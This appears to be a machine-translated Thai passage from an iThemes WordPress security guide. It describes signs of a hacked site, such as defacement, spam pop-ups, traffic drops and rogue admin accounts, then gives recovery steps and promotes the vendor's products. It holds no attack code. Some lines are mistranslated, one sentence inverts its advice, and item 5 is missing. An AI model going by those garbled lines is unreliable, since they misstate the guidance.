การเปลี่ยนแปลงในหน้าแรกของคุณดูเหมือนจะเป็นสัญญาณที่ชัดเจน แต่คุณทำการตรวจสอบอย่างละเอียดหรือหน้าแรกของคุณกี่ครั้ง? ฉันรู้ว่าปกติแล้วฉันจะไปที่ URL เข้าสู่ระบบของฉันโดยตรง ไม่ใช่ URL หลักของฉัน จากที่นั่น ฉันเข้าสู่ระบบ อัปเดตไซต์ของฉัน หรือแก้ไขโพสต์ หลังจากที่ฉันทำสิ่งที่มาทำเสร็จแล้ว ฉันมักจะออกไปโดยไม่ดูหน้าแรกของเว็บไซต์

เป้าหมายหลักของการแฮ็กคือการหลอกล่อเว็บไซต์หรือสร้างความอื้อฉาว ดังนั้นพวกเขาจึงเปลี่ยนหน้าแรกของคุณเป็นสิ่งที่พวกเขาคิดว่าตลกหรือปล่อยให้ ถูกแฮ็กด้วย บัตรโทรศัพท์

หากคุณสังเกตเห็นการเปลี่ยนแปลงในหน้าแรกของคุณ คุณสามารถกู้คืนเว็บไซต์ของคุณได้อย่างรวดเร็วและง่ายดายโดยใช้ไฟล์สำรองที่สร้างจากปลั๊กอินสำรองของ WordPress ที่เชื่อถือได้ เช่น BackupBuddy

2. ประสิทธิภาพเว็บไซต์ของคุณลดลง

ไซต์ของคุณอาจรู้สึกเฉื่อยเมื่อมีการติดเชื้อ คุณอาจประสบปัญหาการชะลอตัวบนเว็บไซต์ของคุณ หากคุณประสบกับการโจมตีแบบเดรัจฉาน หรือมีสคริปต์อันตรายที่ใช้ทรัพยากรเซิร์ฟเวอร์ของคุณสำหรับการขุดสกุลเงินดิจิทัล ในทำนองเดียวกัน DDoS (หรือ การโจมตีแบบปฏิเสธบริการ ) เกิดขึ้นเมื่อเครือข่าย IP ส่งคำขอไปยังเว็บไซต์ของคุณพร้อมกันเพื่อพยายามทำให้เกิดปัญหา

3. เว็บไซต์ของคุณมีโฆษณาป๊อปอัปที่เป็นอันตรายหรือสแปม

มีโอกาสดีที่แฮ็กเกอร์จะโจมตีเว็บไซต์ของคุณหากผู้เยี่ยมชมของคุณเห็นป๊อปอัปที่เปลี่ยนเส้นทางไปยังเว็บไซต์ที่เป็นอันตราย เป้าหมายของการโจมตีประเภทนี้คือการดึงปริมาณการเข้าชมออกจากไซต์ของคุณไปยังไซต์ของผู้โจมตี เพื่อให้สามารถกำหนดเป้าหมายผู้ใช้ด้วยการคลิกหลอกลวงสำหรับการโฆษณาแบบจ่ายต่อคลิก

สิ่งที่น่าผิดหวังที่สุดเกี่ยวกับการแฮ็กประเภทนี้คือคุณอาจไม่เห็นป๊อปอัป แฮ็กป๊อปอัปสามารถออกแบบให้ไม่แสดงสำหรับผู้ใช้ที่เข้าสู่ระบบ ซึ่งจะช่วยลดโอกาสที่เจ้าของเว็บไซต์จะมองเห็นได้ ดังนั้นแม้เจ้าของไซต์จะออกจากระบบ ป๊อปอัปก็จะไม่แสดงขึ้น

มุมมองของป๊อปอัปของคุณอาจถูกจำกัดได้หากคุณใช้ส่วนขยายตัวบล็อกโฆษณาในเบราว์เซอร์ของคุณ ตัวอย่างเช่น ลูกค้ารายงานการแฮ็กป๊อปอัปและแชร์ภาพหน้าจอและวิดีโอของป๊อปอัป หลังจากที่ฉันใช้เวลาหลายชั่วโมงในการทำงานผ่านเว็บไซต์ของพวกเขา ฉันไม่สามารถสร้างสิ่งที่พวกเขารายงานขึ้นมาใหม่ได้ ฉันมั่นใจว่าคอมพิวเตอร์ส่วนบุคคลของพวกเขาถูกแฮ็ก ไม่ใช่เว็บไซต์

ในที่สุด ฉันก็นึกขึ้นได้ว่าเหตุใดฉันจึงไม่เห็นป๊อปอัป ฉันได้ติดตั้งส่วนขยาย adblocker บนเบราว์เซอร์ของฉันแล้ว ทันทีที่ฉันปิดใช้งานส่วนขยายตัวบล็อกโฆษณา ฉันสามารถดูป๊อปอัปได้ทุกที่ ฉันแบ่งปันเรื่องราวที่น่าอับอายนี้เพื่อช่วยให้คุณรอดพ้นจากความผิดพลาดแบบเดียวกัน หวังว่า

4. คุณสังเกตเห็นการเข้าชมเว็บไซต์ลดลง

หากคุณลงชื่อเข้าใช้บัญชี Google Analytics ของคุณและพบว่าการเข้าชมเว็บไซต์ลดลงอย่างมาก ไซต์ WordPress ของคุณอาจถูกแฮ็ก การเข้าชมไซต์ที่ลดลงสมควรได้รับการสอบสวน อาจมีสคริปต์ที่เป็นอันตรายบนไซต์ของคุณที่เปลี่ยนเส้นทางผู้เยี่ยมชมออกจากไซต์ของคุณ หรือ Google สามารถทำได้โดยการขึ้นบัญชีดำเว็บไซต์ของคุณว่าเป็นไซต์ที่เป็นอันตราย

สิ่งแรกที่คุณต้องการมองหาคือการเข้าชมขาออกของเว็บไซต์ของคุณ โดยการติดตามเว็บไซต์ของคุณด้วย Google Analytics คุณจะต้องกำหนดค่าไซต์ของคุณเพื่อติดตามการเข้าชมที่ออกจากไซต์ของคุณ วิธีที่ง่ายที่สุดในการตรวจสอบปริมาณการใช้งานขาออกบนไซต์ WordPress ของคุณคือการใช้ปลั๊กอิน WordPress Google Analytics

6. ผู้ใช้ใหม่ที่ไม่คาดคิด

หากเว็บไซต์ของคุณมีการลงทะเบียนผู้ใช้ที่เป็นผู้ดูแลระบบรายใหม่โดยไม่คาดคิด นั่นเป็นอีกสัญญาณหนึ่งที่แสดงว่าไซต์ WordPress ของคุณถูกแฮ็ก ผู้โจมตีสามารถสร้างผู้ดูแลระบบรายใหม่ผ่านการใช้ประโยชน์จากผู้ใช้ที่ถูกบุกรุก ด้วยสิทธิ์ของผู้ดูแลระบบใหม่ แฮ็กเกอร์พร้อมที่จะสร้างความเสียหายครั้งใหญ่ให้กับไซต์ของคุณ

จำปลั๊กอิน WP GDPR Compliance ก่อนหน้านี้ได้หรือไม่? ในเดือนพฤศจิกายนปี 2018 เรามีรายงานเกี่ยวกับผู้ใช้ที่เป็นผู้ดูแลระบบรายใหม่หลายฉบับที่สร้างขึ้นบนเว็บไซต์ของลูกค้า แฮกเกอร์ใช้ช่องโหว่ในปลั๊กอิน WP GDPR Compliance (ช่องโหว่ที่แก้ไขในเวอร์ชัน 1.4.3) เพื่อสร้างผู้ดูแลระบบใหม่บนไซต์ WordPress ที่ใช้งานปลั๊กอิน ช่องโหว่ของปลั๊กอินอนุญาตให้ผู้ใช้ที่ไม่ได้รับอนุญาตแก้ไขการลงทะเบียนผู้ใช้เพื่อเปลี่ยนบทบาทผู้ใช้ใหม่เริ่มต้นจากสมาชิกเป็นผู้ดูแลระบบ ขออภัย นี่ไม่ใช่จุดอ่อนเพียงจุดเดียว และคุณไม่สามารถลบผู้ใช้ใหม่ที่ผู้โจมตีสร้างและแก้ไขปลั๊กอินได้

หากคุณได้ติดตั้งตามมาตรฐาน WP GDPR และ WooCommerce เว็บไซต์ของคุณอาจถูกแทรกโค้ดที่เป็นอันตราย ผู้โจมตีสามารถใช้ตัวติดตั้งพื้นหลังปลั๊กอิน WooCommerce เพื่อแทรกตัวติดตั้งแบ็คดอร์ในฐานข้อมูล หากไซต์ของคุณมีการติดตั้งแบ็คดอร์ คุณควรติดต่อผู้เชี่ยวชาญด้านการซ่อมแซมการแฮ็ก อีกทางเลือกหนึ่งคือใช้ไฟล์สำรองเพื่อย้อนกลับไปยังสำเนาของเว็บไซต์ของคุณก่อนการละเมิดโดยใช้ข้อมูลสำรองก่อนหน้า

7. ลบผู้ใช้ผู้ดูแลระบบ

หากคุณไม่สามารถลงชื่อเข้าใช้ไซต์ WordPress ของคุณได้ แม้ว่าจะรีเซ็ตรหัสผ่านแล้วก็ตาม อาจเป็นสัญญาณบ่งชี้การติดเชื้อร้ายแรง

เมื่อ repo Gentoo Github ถูกแฮ็ก สิ่งแรกที่ผู้โจมตีทำคือลบผู้ดูแลระบบทั้งหมด แฮ็กเกอร์รายนี้เข้าสู่บัญชี Github ได้อย่างไร? พบรหัสผ่านของผู้ดูแลระบบ Gentoo ในเว็บไซต์อื่น ฉันเดาว่าชื่อผู้ใช้และรหัสผ่านถูกค้นพบผ่านการคัดลอกหรือการถ่ายโอนข้อมูลฐานข้อมูล

แม้ว่ารหัสผ่านของผู้ดูแลระบบสำหรับบัญชี Gentoo Github จะแตกต่างจากรหัสผ่านที่ใช้ในบัญชีที่ถูกบุกรุก แต่ก็คล้ายกันมาก ดังนั้น นี่จะเหมือนกับฉันที่ใช้ iAmAwesome2020 เป็นรหัสผ่านในบัญชีหนึ่ง และ iAmAwesome2021 ในอีกไซต์หนึ่ง ดังนั้นแฮกเกอร์จึงสามารถหารหัสผ่านได้โดยใช้ความพยายามเพียงเล็กน้อย อย่างที่เราเห็น คุณควรใช้รหัสผ่านเฉพาะสำหรับทุกบัญชี รูปแบบรหัสผ่านที่เรียบง่ายไม่เพียงพอ เมื่อใช้ LastPass คุณสามารถสร้างและจัดเก็บรหัสผ่านที่รัดกุมและไม่ซ้ำใครได้อย่างปลอดภัยสำหรับทุกไซต์

วิธีกลับมาจากภัยพิบัติ

หากคุณสงสัยว่ามีการละเมิดเกิดขึ้น มีขั้นตอนสั้นๆ สองสามขั้นตอนที่คุณสามารถทำได้เพื่อลดความเสียหาย

คืนค่าเป็นข้อมูลสำรองก่อนหน้า/ล้างข้อมูลของไซต์ของคุณ

วิธีที่แน่ชัดที่สุดในการยกเลิกการละเมิดความปลอดภัยคือการคืนค่าไซต์ของคุณกลับเป็นเวอร์ชันก่อนหน้า ก่อนการโจมตี นั่นเป็นเหตุว่าทำไมการมีโซลูชันสำรองข้อมูล WordPress ที่ครอบคลุมจึงมีความสำคัญ เราขอแนะนำให้ใช้ BackupBuddy เพื่อกำหนดเวลาการสำรองข้อมูลให้ทำงานโดยอัตโนมัติ เพื่อให้คุณมีข้อมูลสำรองอยู่เสมอ

โปรดทราบว่าการกู้คืนข้อมูลสำรองก่อนหน้าอาจทำให้ไซต์ของคุณเสี่ยงต่อการถูกละเมิดแบบเดียวกัน ดังนั้นการปฏิบัติตามขั้นตอนเหล่านี้จึงเป็นสิ่งสำคัญ

อัปเดตปลั๊กอินและธีมที่ล้าสมัยทั้งหมดทันที

ปลั๊กอินหรือธีมที่มีช่องโหว่อาจยังคงเป็นสาเหตุของปัญหา ดังนั้นจึงควรอัปเดตปลั๊กอินหรือธีมที่ล้าสมัยทั้งหมดโดยทันที แม้ว่าคุณจะกู้คืนเว็บไซต์เป็นเวอร์ชันที่สะอาดก่อนหน้านี้ ช่องโหว่เดิมจะยังคงมีอยู่และสามารถถูกแฮ็กได้อีกครั้ง

คุณอาจต้องการตรวจสอบด้วยว่าคุณไม่ได้ใช้งานปลั๊กอินหรือธีมที่มีช่องโหว่ซึ่งยังไม่มีโปรแกรมแก้ไขจากผู้พัฒนา คุณจะต้องลบปลั๊กอินนี้ทันที

เปิดใช้งานการรับรองความถูกต้องด้วยสองปัจจัย

หากคุณไม่ได้ใช้การตรวจสอบสิทธิ์แบบสองปัจจัยเพื่อรักษาความปลอดภัยการเข้าสู่ระบบของผู้ดูแลระบบ ให้เปิดใช้งานทันที ระดับการรักษาความปลอดภัยที่เพิ่มขึ้นนี้จะช่วยให้แน่ใจว่าผู้ใช้ที่ไม่ได้รับอนุญาตจะไม่สามารถแฮ็กบัญชีผู้ดูแลระบบใดๆ ได้

ขอความช่วยเหลือสำหรับการกำจัดมัลแวร์แบบมืออาชีพ

การละเมิดความปลอดภัยของ WordPress เกิดขึ้นที่ระดับเซิร์ฟเวอร์ (ลึกกว่าการติดตั้ง WordPress ของคุณ) ดังนั้นคุณอาจต้องติดต่อบริการกำจัดมัลแวร์มืออาชีพ เราขอแนะนำ WeWatchYourWebsite สำหรับการกำจัดมัลแวร์อย่างมืออาชีพ

บทสรุป: WordPress Security Ultimate Guide

ในคู่มือความปลอดภัย WordPress นี้ เราได้กล่าวถึงเรื่องต่างๆ มากมาย! แต่โดยการทำตามคำแนะนำในคู่มือนี้ คุณจะบล็อกเกือบ 100% ของการโจมตีที่เรียกเก็บจากเว็บไซต์ของคุณ

ปลั๊กอินความปลอดภัยของ WordPress สามารถช่วยให้เว็บไซต์ WordPress ของคุณปลอดภัย

เมื่อรวมกับความรู้เกี่ยวกับหัวข้อความปลอดภัยของ WordPress ในคู่มือนี้แล้ว ปลั๊กอินความปลอดภัย WordPress สามารถช่วยรักษาความปลอดภัยให้กับเว็บไซต์ WordPress ของคุณได้ iThemes Security Pro ปลั๊กอินความปลอดภัย WordPress ของเรามีมากกว่า 50 วิธีในการรักษาความปลอดภัยและปกป้องเว็บไซต์ของคุณจากช่องโหว่ด้านความปลอดภัยทั่วไปของ WordPress ด้วย WordPress การตรวจสอบสิทธิ์แบบสองปัจจัย การป้องกันแบบเดรัจฉาน การบังคับใช้รหัสผ่านที่รัดกุม และอื่นๆ คุณสามารถเพิ่มระดับการรักษาความปลอดภัยเพิ่มเติมให้กับเว็บไซต์ของคุณได้

ไมเคิล มัวร์

ในแต่ละสัปดาห์ Michael จะรวบรวมรายงานช่องโหว่ของ WordPress เพื่อช่วยให้เว็บไซต์ของคุณปลอดภัย ในฐานะผู้จัดการผลิตภัณฑ์ที่ iThemes เขาช่วยเราปรับปรุงรายการผลิตภัณฑ์ iThemes ต่อไป เขาเป็นคนเนิร์ดยักษ์และชอบเรียนรู้เกี่ยวกับเทคโนโลยีทุกอย่าง ทั้งเก่าและใหม่ คุณสามารถหาไมเคิลไปเที่ยวกับภรรยาและลูกสาว อ่านหนังสือหรือฟังเพลงเมื่อไม่ได้ทำงาน